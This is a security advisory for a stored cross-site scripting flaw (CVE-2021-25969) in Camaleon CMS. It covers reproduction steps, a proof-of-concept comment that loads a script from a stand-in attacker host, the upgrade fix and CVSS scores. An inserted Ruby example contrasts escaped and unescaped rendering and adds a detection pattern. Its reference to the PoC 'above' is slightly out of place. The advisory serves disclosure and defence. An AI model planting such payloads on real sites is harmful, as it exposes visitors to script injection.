
CVE-2021-25969

Date: October 20, 2021

Overview

Camaleon CMS versions 0.0.1 to 2.6.0 are vulnerable to stored XSS, which allows an unauthenticated attacker to store malicious scripts in the comments section of a post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.

Details

The “Camaleon CMS” application is affected by a stored XSS vulnerability that allows unprivileged application users to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.
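The following Ruby example is added here to illustrate the bug class the advisory describes; it is not Camaleon CMS code and makes no claim about which template the project actually changed in 2.6.0.1. It places a comment template that interpolates user input verbatim beside one that HTML-escapes it with the standard library's ERB::Util.html_escape, and adds a small audit helper a site operator could run over already-stored comments after patching. The comment body is the constructed payload shape from the PoC above; function names, the regular expression and the sample records are assumptions of this example.

```ruby
# Added example (not Camaleon CMS code): an unescaped comment template beside
# one that HTML-escapes user input before it reaches the page, plus an audit
# helper for comments that were stored while the unescaped path was live.
require 'erb'
require 'cgi'

# Constructed sample input: the same payload shape as the advisory's PoC comment.
MALICIOUS_COMMENT = '<script src="http://<attacker_ip>:<port>/test.js"></script>'
BENIGN_COMMENT    = 'Great post! 5 > 3 & "quotes" work.'

# Vulnerable pattern: user-supplied text interpolated into markup verbatim.
# This reproduces the failure mode the advisory describes: the browser parses
# the stored comment as markup, so a <script> element in it executes.
def render_comment_unescaped(body)
  "<div class=\"comment\">#{body}</div>"
end

# Hardened pattern: escape every HTML metacharacter so the browser renders the
# comment as text. ERB::Util.html_escape is what Rails' ERB templates apply by
# default; stored XSS of this kind arises when that escaping is bypassed
# (raw / html_safe) or the template engine is configured not to escape.
def render_comment_escaped(body)
  "<div class=\"comment\">#{ERB::Util.html_escape(body)}</div>"
end

# Defensive check (assumed pattern, not exhaustive): does a string contain an
# executable element, an inline event-handler attribute, or a javascript: URL?
ACTIVE_CONTENT = /<\s*(script|iframe|object|embed)\b|\bon\w+\s*=|javascript:/i

def contains_active_content?(html)
  !(html =~ ACTIVE_CONTENT).nil?
end

# Audit helper for comments already stored in the database: returns the ids of
# records whose raw body would execute if rendered without escaping, so they
# can be reviewed or removed after the upgrade. Records are hashes with :id and
# :body (constructed shape for this example).
def flag_stored_comments(comments)
  comments.select { |c| contains_active_content?(c[:body]) }.map { |c| c[:id] }
end

if __FILE__ == $PROGRAM_NAME
  puts render_comment_unescaped(MALICIOUS_COMMENT)   # markup survives intact
  puts render_comment_escaped(MALICIOUS_COMMENT)     # rendered as inert text
  sample = [{ id: 1, body: BENIGN_COMMENT }, { id: 2, body: MALICIOUS_COMMENT }]
  p flag_stored_comments(sample)                     # [2]
end
```

Escaping at render time is the fix; the audit helper only narrows down which stored rows deserve a look, since a regular expression is not a substitute for output encoding.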

PoC Details

Log in to the application as administrator.
Go to Settings, General Site. Click on the Configuration tab and enable the following options:
1. Register comments as approved
2. Allow anonymous comments
Then go to the Post section in the left menu under the Contents section and click All Items to show all the posts. Edit a post by clicking on the pencil icon, check the “Allow Comments” option to allow comments on the post, and click on the Update button.
Now open the application in incognito mode and navigate to the “/sample-post” endpoint to view the post. The option to leave a comment can be seen at the end of the post.
As an attacker, create a file “test.js” containing a malicious script such as the one given below, and run a simple Python server to serve the file. Create a new comment with the script given below.
Now any user visiting the post is affected. To confirm it, log in again as administrator, visit the same post, and notice that the admin is affected.

PoC Code

// Command to run the Python Simple Server to host the malicious file:
python3 -m http.server <port_number>
// Create a new comment with the following script: 
<script src="http://<attacker_ip>:<port>/test.js"></script>

// Contents of test.js:
alert('XSS');

Affected Environments

Camaleon CMS versions 0.0.1 to 2.6.0

Prevention

Update to camaleon_cms version 2.6.0.1

Language: Ruby

Good to know:

Cross-Site Scripting (XSS), CWE-79

Upgrade Version: camaleon_cms 2.6.0.1

Base Score (CVSS v3.x):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

Base Score (CVSS v2):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None